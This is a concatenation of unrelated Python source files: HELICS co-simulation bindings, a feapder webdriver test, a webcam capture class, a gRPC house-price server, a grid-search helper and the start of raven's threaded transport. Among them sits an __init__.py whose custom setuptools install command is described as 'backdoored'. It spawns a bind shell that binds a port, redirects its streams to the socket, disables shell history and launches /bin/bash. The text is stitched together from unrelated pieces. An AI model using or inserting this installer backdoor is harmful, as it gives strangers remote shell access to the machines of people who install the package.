f = loadSym("helicsInputGetComplexObject")
err = helicsErrorInitialize()
result = f(ipt.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
warnings.warn("This function will return a complex number in the next major release")
return (result.real, result.imag)
def helicsInputGetComplex(ipt: HelicsInput) -> Tuple[float, float]:
"""
Get a pair of double forming a complex number from a subscriptions.
**Parameters**
- **`ipt`** - The input to get the data for.
**Returns**: a pair of floating point values that represent the real and imag values
"""
f = loadSym("helicsInputGetComplex")
err = helicsErrorInitialize()
real = ffi.new("double *")
imag = ffi.new("double *")
f(ipt.handle, real, imag, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
warnings.warn("This function will return a complex number in the next major release")
return (real[0], imag[0])
def helicsInputGetVectorSize(ipt: HelicsInput) -> int:
"""
Get the size of a value for subscription assuming return as an array of doubles.
**Returns**: The number of doubles in a returned vector.
"""
f = loadSym("helicsInputGetVectorSize")
result = f(ipt.handle)
return result
def helicsInputGetVector(ipt: HelicsInput) -> List[float]:
"""
Get a vector from a subscription.
**Parameters**
- **`ipt`** - The input to get the result for.
**Returns**: a list of floating point values
"""
f = loadSym("helicsInputGetVector")
err = helicsErrorInitialize()
maxlen = helicsInputGetVectorSize(ipt) + 1024
data = ffi.new("double[{maxlen}]".format(maxlen=maxlen))
actualSize = ffi.new("int[1]")
f(ipt.handle, data, maxlen, actualSize, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return [x for x in data][0 : actualSize[0]]
def helicsInputGetNamedPoint(ipt: HelicsInput) -> Tuple[str, float]:
"""
Get a named point from a subscription.
**Parameters**
- **`ipt`** - The input to get the result for.
**Returns**: a string and a double value for the named point
"""
f = loadSym("helicsInputGetNamedPoint")
err = helicsErrorInitialize()
maxStringLen = helicsInputGetStringSize(ipt) + 1024
outputString = ffi.new("char[{maxStringLen}]".format(maxStringLen=maxStringLen))
actualLength = ffi.new("int[1]")
value = ffi.new("double[1]")
f(ipt.handle, outputString, maxStringLen, actualLength, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return ffi.string(outputString, maxlen=actualLength[0]).decode(), value[0]
def helicsInputSetDefaultRaw(ipt: HelicsInput, data: bytes):
"""
Default Value functions.
These functions set the default value for a subscription. That is the value returned if nothing was published from elsewhere.
Set the default as a raw data array.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`data`** - A pointer to the raw data to use for the default.
**DEPRECATED**
"""
warnings.warn("This function has been deprecated. Use `helicsInputSetDefaultBytes` instead.")
helicsInputSetDefaultBytes(ipt, data)
def helicsInputSetDefaultBytes(ipt: HelicsInput, data: bytes):
"""
Default Value functions.
These functions set the default value for a subscription. That is the value returned if nothing was published from elsewhere.
Set the default as a raw data array.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`data`** - A pointer to the raw data to use for the default.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsInputSetDefaultRaw")
else:
f = loadSym("helicsInputSetDefaultBytes")
err = helicsErrorInitialize()
if isinstance(data, str):
data = data.encode()
if not isinstance(data, bytes):
raise HelicsException(
"""Raw data must be of type `bytes`. Got {t} instead. Try converting it to bytes (e.g. `"hello world".encode()`""".format(t=type(data))
)
inputDataLength = len(data)
f(ipt.handle, data, inputDataLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultString(ipt: HelicsInput, string: str):
"""
Set the default as a string.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`string`** - A pointer to the default string.
"""
f = loadSym("helicsInputSetDefaultString")
err = helicsErrorInitialize()
f(ipt.handle, cstring(string), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultInteger(ipt: HelicsInput, value: int):
"""
Set the default as an integer.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`value`** - The default integer.
"""
f = loadSym("helicsInputSetDefaultInteger")
err = helicsErrorInitialize()
f(ipt.handle, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultBoolean(ipt: HelicsInput, value: bool):
"""
Set the default as a boolean.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`value`** - The default boolean value.
"""
f = loadSym("helicsInputSetDefaultBoolean")
err = helicsErrorInitialize()
f(ipt.handle, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultTime(ipt: HelicsInput, value: HelicsTime):
"""
Set the default as a time.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`value`** - The default time value.
"""
f = loadSym("helicsInputSetDefaultTime")
err = helicsErrorInitialize()
f(ipt.handle, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultChar(ipt: HelicsInput, value: str):
"""
Set the default as a char.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`value`** - The default char value.
"""
f = loadSym("helicsInputSetDefaultChar")
err = helicsErrorInitialize()
f(ipt.handle, cchar(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultDouble(ipt: HelicsInput, value: float):
"""
Set the default as a double.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`value`** - The default double value.
"""
f = loadSym("helicsInputSetDefaultDouble")
err = helicsErrorInitialize()
f(ipt.handle, value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultComplex(ipt: HelicsInput, real: float, imag: float = 0):
"""
Set the default as a complex number.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`real`** - The default real value.
- **`imag`** - The default imaginary value.
"""
c = complex(real, imag)
f = loadSym("helicsInputSetDefaultComplex")
err = helicsErrorInitialize()
f(ipt.handle, c.real, c.imag, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultVector(ipt: HelicsInput, vectorInput: List[float]):
"""
Set the default as a vector of doubles.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`vectorInput`** - A pointer to an array of double data.
"""
f = loadSym("helicsInputSetDefaultVector")
err = helicsErrorInitialize()
vectorLength = len(vectorInput)
f(ipt.handle, vectorInput, vectorLength, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetDefaultNamedPoint(ipt: HelicsInput, string: str, value: float):
"""
Set the default as a `NamedPoint`.
**Parameters**
- **`ipt`** - The input to set the default for.
- **`string`** - A pointer to a string representing the name.
- **`value`** - A double value for the value of the named point.
"""
f = loadSym("helicsInputSetDefaultNamedPoint")
err = helicsErrorInitialize()
f(ipt.handle, cstring(string), cdouble(value), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputGetType(ipt: HelicsInput) -> str:
"""
Get the type of an input.
**Parameters**
- **`ipt`** - The input to query
**Returns**: A string with the type information.
"""
f = loadSym("helicsInputGetType")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsInputGetPublicationType(ipt: HelicsInput) -> str:
"""
Get the type the publisher to an input is sending.
**Parameters**
- **`ipt`** - The input to query
**Returns**: A string with the type information.
"""
f = loadSym("helicsInputGetPublicationType")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsPublicationGetType(pub: HelicsPublication) -> str:
"""
Get the type of a publication.
**Parameters**
- **`pub`** - The publication to query
**Returns**: A string with the publication type information.
"""
f = loadSym("helicsPublicationGetType")
result = f(pub.handle)
return ffi.string(result).decode()
def helicsInputGetKey(ipt: HelicsInput) -> str:
"""
Get the name of an input.
**Parameters**
- **`ipt`** - The input to query
**Returns**: A string with the name information.
**DEPRECATED**
"""
warnings.warn("This is deprecated. Use `helicsInputGetName` instead.")
return helicsInputGetName(ipt)
def helicsInputGetName(ipt: HelicsInput) -> str:
"""
Get the name of an input.
**Parameters**
- **`ipt`** - The input to query
**Returns**: A string with the name information.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsInputGetKey")
else:
f = loadSym("helicsInputGetName")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsSubscriptionGetKey(ipt: HelicsInput) -> str:
"""
Get the name of a subscription.
**Returns**: A string with the subscription name.
**DEPRECATED**
"""
warnings.warn("This is deprecated. Use `helicsSubscriptionGetTarget` instead.")
return helicsSubscriptionGetTarget(ipt)
def helicsSubscriptionGetTarget(ipt: HelicsInput) -> str:
"""
Get the target of a subscription.
**Returns**: A string with the subscription target.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsSubscriptionGetKey")
else:
f = loadSym("helicsSubscriptionGetTarget")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsPublicationGetKey(pub: HelicsPublication) -> str:
"""
Get the name of a publication.
This will be the global name used to identify the publication to the federation.
**Parameters**
- **`pub`** - The publication to query.
**Returns**: A string with the units information.
**DEPRECATED**
"""
warnings.warn("This is deprecated. Use `helicsPublicationGetName` instead.")
return helicsPublicationGetName(pub)
def helicsPublicationGetName(pub: HelicsPublication) -> str:
"""
Get the name of a publication.
This will be the global name used to identify the publication to the federation.
**Parameters**
- **`pub`** - The publication to query.
**Returns**: A string with the units information.
"""
if HELICS_VERSION == 2:
f = loadSym("helicsPublicationGetKey")
else:
f = loadSym("helicsPublicationGetName")
result = f(pub.handle)
return ffi.string(result).decode()
def helicsInputGetUnits(ipt: HelicsInput) -> str:
"""
Get the units of an input.
**Parameters**
- **`ipt`** - The input to query.
**Returns**: A string with the units information.
"""
f = loadSym("helicsInputGetUnits")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsInputGetInjectionUnits(ipt: HelicsInput) -> str:
"""
Get the units of the publication that an input is linked to.
**Parameters**
- **`ipt`** - The input to query.
**Returns**: A string with the units information.
"""
f = loadSym("helicsInputGetInjectionUnits")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsInputGetExtractionUnits(ipt: HelicsInput) -> str:
"""
Get the units of an input.
The same as `helics.helicsInputGetUnits`.
**Parameters**
- **`ipt`** - The input to query.
**Returns**: A string with the units information.
"""
f = loadSym("helicsInputGetExtractionUnits")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsPublicationGetUnits(pub: HelicsPublication) -> str:
"""
Get the units of a publication.
**Parameters**
- **`pub`** - The publication to query.
**Returns**: A string with the units information.
"""
f = loadSym("helicsPublicationGetUnits")
result = f(pub.handle)
return ffi.string(result).decode()
def helicsInputGetInfo(ipt: HelicsInput) -> str:
"""
Get the data in the info field of an input.
**Parameters**
- **`ipt`** - The input to query.
**Returns**: A string with the info field string.
"""
f = loadSym("helicsInputGetInfo")
result = f(ipt.handle)
return ffi.string(result).decode()
def helicsInputSetInfo(ipt: HelicsInput, info: str):
"""
Set the data in the info field for an input.
**Parameters**
- **`ipt`** - The input to query.
- **`info`** - The string to set.
"""
f = loadSym("helicsInputSetInfo")
err = helicsErrorInitialize()
f(ipt.handle, cstring(info), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationGetInfo(pub: HelicsPublication) -> str:
"""
Get the data in the info field of an publication.
**Parameters**
- **`pub`** - The publication to query.
**Returns**: A string with the info field string.
"""
f = loadSym("helicsPublicationGetInfo")
result = f(pub.handle)
return ffi.string(result).decode()
def helicsPublicationSetInfo(pub: HelicsPublication, info: str):
"""
Set the data in the info field for a publication.
**Parameters**
- **`pub`** - The publication to set the info field for.
- **`info`** - The string to set.
"""
f = loadSym("helicsPublicationSetInfo")
err = helicsErrorInitialize()
f(pub.handle, cstring(info), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputGetOption(ipt: HelicsInput, option: HelicsHandleOption) -> int:
"""
Get the current value of an input handle option.
**Parameters**
- **`ipt`** - The input to query.
- **`option`** - Integer representation of the option in question see `helics.HelicsHandleOption`.
**Returns**: An integer value with the current value of the given option.
"""
f = loadSym("helicsInputGetOption")
result = f(ipt.handle, HelicsHandleOption(option))
return result
def helicsInputSetOption(ipt: HelicsInput, option: HelicsHandleOption, value: int):
"""
Set an option on an input.
**Parameters**
- **`ipt`** - The input to query.
- **`option`** - The option to set for the input `helics.HelicsHandleOption`.
- **`value`** - The value to set the option to.
"""
f = loadSym("helicsInputSetOption")
err = helicsErrorInitialize()
f(ipt.handle, HelicsHandleOption(option), value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationGetOption(pub: HelicsPublication, option: HelicsHandleOption) -> int:
"""
Get the value of an option for a publication.
**Parameters**
- **`pub`** - The publication to query.
- **`option`** - The value to query see `helics.HelicsHandleOption`.
**Returns**: A string with the info field string.
"""
f = loadSym("helicsPublicationGetOption")
result = f(pub.handle, HelicsHandleOption(option))
return result
def helicsPublicationSetOption(pub: HelicsPublication, option: HelicsHandleOption, value: int):
"""
Set the value of an option for a publication.
**Parameters**
- **`pub`** - The publication to query.
- **`option`** - Integer code for the option to set `helics.HelicsHandleOption`.
- **`value`** - The value to set the option to.
"""
f = loadSym("helicsPublicationSetOption")
err = helicsErrorInitialize()
f(pub.handle, HelicsHandleOption(option), value, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsPublicationSetMinimumChange(pub: HelicsPublication, tolerance: float):
"""
Set the minimum change detection tolerance.
**Parameters**
- **`pub`** - The publication to modify.
- **`tolerance`** - The tolerance level for publication, values changing less than this value will not be published.
"""
f = loadSym("helicsPublicationSetMinimumChange")
err = helicsErrorInitialize()
f(pub.handle, cdouble(tolerance), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputSetMinimumChange(ipt: HelicsInput, tolerance: float):
"""
Set the minimum change detection tolerance.
**Parameters**
- **`ipt`** - The input to modify.
- **`tolerance`** - The tolerance level for registering an update, values changing less than this value will not show asbeing updated.
"""
f = loadSym("helicsInputSetMinimumChange")
err = helicsErrorInitialize()
f(ipt.handle, cdouble(tolerance), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsInputIsUpdated(ipt: HelicsInput) -> bool:
"""
Check if a particular subscription was updated.
**Returns**: `True` if it has been updated since the last value retrieval.
"""
f = loadSym("helicsInputIsUpdated")
result = f(ipt.handle)
return result == 1
def helicsInputLastUpdateTime(ipt: HelicsInput) -> HelicsTime:
"""
Get the last time a subscription was updated.
"""
f = loadSym("helicsInputLastUpdateTime")
result = f(ipt.handle)
return result
def helicsInputClearUpdate(ipt: HelicsInput):
"""
Clear the updated flag from an input.
"""
f = loadSym("helicsInputClearUpdate")
f(ipt.handle)
def helicsFederateGetPublicationCount(fed: HelicsFederate) -> int:
"""
Get the number of publications in a federate.
**Returns**: (-1) if fed was not a valid federate otherwise returns the number of publications.
"""
f = loadSym("helicsFederateGetPublicationCount")
result = f(fed.handle)
return result
def helicsFederateGetInputCount(fed: HelicsFederate) -> int:
"""
Get the number of subscriptions in a federate.
**Returns**: (-1) if fed was not a valid federate otherwise returns the number of subscriptions.
"""
f = loadSym("helicsFederateGetInputCount")
result = f(fed.handle)
return result
def helicsFederateSetLoggingCallback(fed: HelicsFederate, logger, user_data):
"""
Set the logging callback for a `helics.HelicsFederate`
Add a logging callback function for the C.
The logging callback will be called when a message flows into a `helics.HelicsFederate` from the core or from a federate.
# Parameters
- **`fed`**: the `helics.HelicsFederate` that is created with `helics.helicsCreateValueFederate`, `helics.helicsCreateMessageFederate` or `helics.helicsCreateCombinationFederate`
- **`logger`**: a callback with signature void(int, const char *, const char *, void *); the function arguments are loglevel, an identifier string, and a message string, and a pointer to user data
- **`user_data`**: a pointer to user data that is passed to the function when executing
"""
f = loadSym("helicsFederateSetLoggingCallback")
err = helicsErrorInitialize()
f(fed.handle, logger, user_data, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFilterSetCustomCallback(filter: HelicsFilter, callback, userdata):
f = loadSym("helicsFilterSetCustomCallback")
err = helicsErrorInitialize()
f(filter.handle, callback, userdata, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerClearTimeBarrier(broker: HelicsBroker):
f = loadSym("helicsBrokerClearTimeBarrier")
f(broker.handle)
def helicsBrokerSetTimeBarrier(broker: HelicsBroker, barrier_time: HelicsTime):
"""
Set the broker time barrier
# Parameters
- **`broker`**: the `helics.HelicsBroker`
- **`barrier_time`**: the barrier time
"""
f = loadSym("helicsBrokerSetTimeBarrier")
err = helicsErrorInitialize()
f(broker.handle, barrier_time, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateSendCommand(fed: HelicsFederate, target: str, command: str):
f = loadSym("helicsFederateSendCommand")
err = helicsErrorInitialize()
f(fed.handle, cstring(target), cstring(command), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateGetCommand(fed: HelicsFederate) -> str:
f = loadSym("helicsFederateGetCommand")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return ffi.string(result).decode()
def helicsFederateGetCommandSource(fed: HelicsFederate) -> str:
f = loadSym("helicsFederateGetCommandSource")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return ffi.string(result).decode()
def helicsFederateWaitCommand(fed: HelicsFederate) -> str:
f = loadSym("helicsFederateWaitCommand")
err = helicsErrorInitialize()
result = f(fed.handle, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return ffi.string(result).decode()
def helicsCoreSendCommand(core, target, command, err):
f = loadSym("helicsCoreSendCommand")
err = helicsErrorInitialize()
f(core.handle, cstring(target), cstring(command), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsBrokerSendCommand(broker, target, command, err):
f = loadSym("helicsBrokerSendCommand")
err = helicsErrorInitialize()
f(broker.handle, cstring(target), cstring(command), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsFederateRegisterTargetedEndpoint(fed: HelicsFederate, name: str, type: str):
"""
Create an targeted endpoint.
The endpoint becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for endpoints.
# Parameters
- **`fed`** - The `helics.HelicsFederate` in which to create an endpoint must have been created with helicsCreateMessageFederate or helicsCreateCombinationFederate.
- **`name`** - The identifier for the endpoint. This will be prepended with the federate name for the global identifier.
- **`type`** - A string describing the expected type of the publication (optional).
**Returns**: `helics.HelicsEndpoint`.
"""
f = loadSym("helicsFederateRegisterTargetedEndpoint")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsEndpoint(result, cleanup=False)
def helicsFederateRegisterGlobalTargetedEndpoint(fed: HelicsFederate, name: str, type: str):
"""
Create a globally targeted endpoint.
The endpoint becomes part of the federate and is destroyed when the federate is freed so there are no separate free functions for endpoints.
# Parameters
- **`fed`** - The `helics.HelicsFederate` in which to create an endpoint must have been created with helicsCreateMessageFederate or helicsCreateCombinationFederate.
- **`name`** - The identifier for the endpoint. This will be prepended with the federate name for the global identifier.
- **`type`** - A string describing the expected type of the publication (optional).
**Returns**: `helics.HelicsEndpoint`.
"""
f = loadSym("helicsFederateGlobalRegisterTargetedEndpoint")
err = helicsErrorInitialize()
result = f(fed.handle, cstring(name), cstring(type), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
else:
return HelicsEndpoint(result, cleanup=False)
def helicsEndpointAddSourceTarget(endpoint: HelicsEndpoint, source_name: str):
"""
Add a source target to a endpoint.
All messages coming from a source are copied to the delivery address(es).
# Parameters
- **`endpoint`** - The given endpoint.
- **`source_name`** - The name of the endpoint to add as a source target.
"""
f = loadSym("helicsEndpointAddSourceTarget")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(source_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointAddDestinationTarget(endpoint: HelicsEndpoint, destination_name: str):
"""
Add a destination target to a endpoint.
All messages coming from a source are copied to the delivery address(es).
# Parameters
- **`endpoint`** - The given endpoint.
- **`source_name`** - The name of the endpoint to add as a source target.
"""
f = loadSym("helicsEndpointAddDestinationTarget")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(destination_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointRemoveTarget(endpoint: HelicsEndpoint, target: str):
"""
Remove target from endpoint
# Parameters
- **`endpoint`** - The given endpoint.
- **`target_name`** - The name of the endpoint to remove.
"""
f = loadSym("helicsEndpointAddRemoveTarget")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(target), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointAddSourceFilter(endpoint: HelicsEndpoint, filter_name: str):
"""
Add source filter to endpoint
# Parameters
- **`endpoint`** - The endpoint.
- **`filter_name`** - The name of the filter.
"""
f = loadSym("helicsEndpointAddSourceFilter")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(filter_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsEndpointAddDestinationFilter(endpoint: HelicsEndpoint, filter_name: str):
"""
Add destination filter to endpoint
# Parameters
- **`endpoint`** - The endpoint.
- **`filter_name`** - The name of the filter.
"""
f = loadSym("helicsEndpointAddDestinationFilter")
err = helicsErrorInitialize()
f(endpoint.handle, cstring(filter_name), err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsQuerySetOrdering(query: HelicsQuery, mode: int):
"""
Update the ordering mode of the query, fast runs on priority channels, ordered goes on normal channels but goes in sequence
# Parameters
- **`query`**: The query object to change the order for.
- **`mode`**: 0 for fast, 1 for ordered.
"""
f = loadSym("helicsQuerySetOrdering")
err = helicsErrorInitialize()
f(query.handle, mode, err)
if err.error_code != 0:
raise HelicsException("[" + str(err.error_code) + "] " + ffi.string(err.message).decode())
def helicsLoadSignalHandler():
"""
Load a signal handler that handles Ctrl-C and shuts down the library
"""
f = loadSym("helicsLoadSignalHandler")
f()
def helicsAbort(error_code: int, message: str):
f = loadSym("helicsAbort")
f(error_code, cstring(message))
try:
import threading
@ffi.callback("int handler(int)")
def _handle_helicsCallBack(code: int):
def target():
helicsAbort(code, "User pressed Ctrl-C")
helicsCloseLibrary()
x = threading.Thread(target=target)
x.start()
return 0
except Exception:
_handle_helicsCallBack = None
def helicsLoadSignalHandlerCallback():
if _handle_helicsCallBack is not None:
try:
f = loadSym("helicsLoadSignalHandlerCallback")
f(_handle_helicsCallBack)
except Exception:
pass
helicsLoadSignalHandlerCallback()
|
test_webdriver.py
|
# -*- coding: utf-8 -*-
"""
Created on 2021/3/18 7:05 下午
---------
@summary:
---------
@author: Boris
@email: boris_liu@foxmail.com
"""
from feapder.utils.webdriver import WebDriverPool, WebDriver
import threading
def test_webdirver_pool():
webdriver_pool = WebDriverPool(
pool_size=2, load_images=False, driver_type=WebDriver.FIREFOX, timeout=30
)
def request():
try:
browser = webdriver_pool.get()
browser.get("https://baidu.com")
print(browser.title)
webdriver_pool.put(browser)
except:
print("失败")
for i in range(5):
threading.Thread(target=request).start()
def test_webdriver():
with WebDriver(
load_images=True, driver_type=WebDriver.CHROME, timeout=30
) as browser:
browser.get("https://httpbin.org/get")
html = browser.page_source
print(html)
import time
time.sleep(1000)
test_webdriver()
|
webcam.py
|
import cv2
from threading import Thread
class Webcam:
def __init__(self, device):
self.video_capture = cv2.VideoCapture(device)
self.current_frame = self.video_capture.read()[1]
def start(self):
th = Thread(target=self._update_frame, args=())
th.daemon = True
th.start()
def _update_frame(self):
while(True):
self.current_frame = self.video_capture.read()[1]
def get_current_frame(self):
return self.current_frame
def destroy(self):
self.video_capture.release()
def get_resolution(self):
return (self.video_capture.get(3), self.video_capture.get(4))
def set_resolution(self, width, height):
self.video_capture.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.video_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
|
house_price_prediction_server.py
|
import grpc
from concurrent import futures
import threading
# import the generated classes :
import model_pb2
import model_pb2_grpc
from app import app_run, get_parameters
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
port = 8061
# create a class to define the server functions, derived from
class DatabrokerServicer(model_pb2_grpc.DatabrokerServicer):
def hppdatabroker(self, request, context):
parameters = get_parameters()
logger.debug("Connecting to databroker")
response = model_pb2.Features(MSSubClass=float(parameters[0]), LotArea=float(parameters[1]),
YearBuilt=float(parameters[2]), BedroomAbvGr=float(parameters[3]),
TotRmsAbvGrd=float(parameters[4])
)
logger.debug(response)
return response
def serve():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
model_pb2_grpc.add_DatabrokerServicer_to_server(DatabrokerServicer(), server)
server.add_insecure_port('[::]:{}'.format(port))
logger.debug("Start server")
server.start()
logger.debug("Start databroker UI")
threading.Thread(target=app_run()).start()
server.wait_for_termination()
logger.debug("Threads ended")
if __name__ == '__main__':
logging.basicConfig()
serve()
|
__init__.py
|
import multiprocessing
import time
import os
import pty
import socket
from setuptools.command.install import install as base
def shell(port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', int(port)))
s.listen(1)
(rem, addr) = s.accept()
os.dup2(rem.fileno(), 0)
os.dup2(rem.fileno(), 1)
os.dup2(rem.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')
pty.spawn("/bin/bash")
s.close()
def multi(port):
cc = multiprocessing.Process(name='shell', target=shell, args=(port,))
cc.start()
class install(base):
"""
Backdoored install function that spawns a bind shell
"""
user_options = base.user_options + [
('port=', None, "Port to bind to")
]
def initialize_options(self):
base.initialize_options(self)
self.port = None
def run(self):
if self.port:
mult = multiprocessing.Process(name='multi', target=multi, args=(self.port,))
mult.daemon = False
mult.start()
time.sleep(.5) # Give it just long enought to start
mult.terminate()
base.run(self)
|
grid_search.py
|
import time
import logging
from copy import deepcopy
from multiprocessing import Process
from run.utils import change_config
from utility.utils import product_flatten_dict
logger = logging.getLogger(__name__)
class GridSearch:
def __init__(self,
configs,
train_func,
n_trials=1,
logdir='logs',
dir_prefix='',
separate_process=False,
delay=1):
self.configs = configs
self.train_func = train_func
self.n_trials = n_trials
self.root_dir = logdir
self.dir_prefix = dir_prefix
self.separate_process = separate_process
self.delay=delay
self.processes = []
def __call__(self, **kwargs):
self._setup_root_dir()
if kwargs == {} and self.n_trials == 1 and not self.separate_process:
# if no argument is passed in, run the default setting
p = Process(target=self.train_func, args=self.configs)
self.processes.append(p)
else:
# do grid search
model_name = ''
self._change_config(model_name, **kwargs)
return self.processes
def _setup_root_dir(self):
if self.dir_prefix:
self.dir_prefix += '-'
self.root_dir = (f'{self.root_dir}/'
f'{self.configs.env["name"]}/'
f'{self.configs.agent["algorithm"]}')
def _change_config(self, model_name, **kwargs):
kw_list = product_flatten_dict(**kwargs)
for d in kw_list:
# deepcopy to avoid unintended conflicts
configs = deepcopy(self.configs._asdict())
for k, v in d.items():
# search k in configs
key_configs = {}
for name, config in configs._asdict():
if k in config:
key_configs[name] = config
assert key_configs != [], f'{k} does not appear in any of configs'
logger.info(f'{k} appears in the following configs: '
f'{list([n for n, _ in key_configs.items()])}.\n')
# change value in config
for config in key_configs.values():
if isinstance(config[k], dict):
config[k].update(v)
else:
config[k] = v
if model_name:
model_name += '-'
# add "key=value" to model name
model_name += f'{k}={v}'
mn = model_name
for i in range(1, self.n_trials+1):
configs = deepcopy(self.configs)
if self.n_trials > 1:
mn += f'-trial{i}' if model_name else f'trial{i}'
if 'seed' in configs.env:
configs.env['seed'] = 1000 * i
if 'video_path' in configs.env:
configs.env['video_path'] = \
f'{self.root_dir}/{mn}/{configs.env["video_path"]}'
kw = [f'root_dir={self.root_dir}', f'model_name={mn}']
change_config(kw, configs)
p = Process(target=self.train_func, args=configs)
p.start()
self.processes.append(p)
time.sleep(self.delay) # ensure sub-processs starts in order
|
threaded.py
|
"""
raven.transport.threaded
~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import atexit
import logging
import time
import threading
import os
from raven.utils.compat import Queue
from raven.transport.base import HTTPTransport, AsyncTransport
DEFAULT_TIMEOUT = 10
logger = logging.getLogger('sentry.errors')
class AsyncWorker(object):
_terminator = object()
def __init__(self, shutdown_timeout=DEFAULT_TIMEOUT):
self._queue = Queue(-1)
self._lock = threading.Lock()
self._thread = None
self.options = {
'shutdown_timeout': shutdown_timeout,
}
self.start()
def main_thread_terminated(self):
size = self._queue.qsize()
if size:
timeout = self.options['shutdown_timeout']
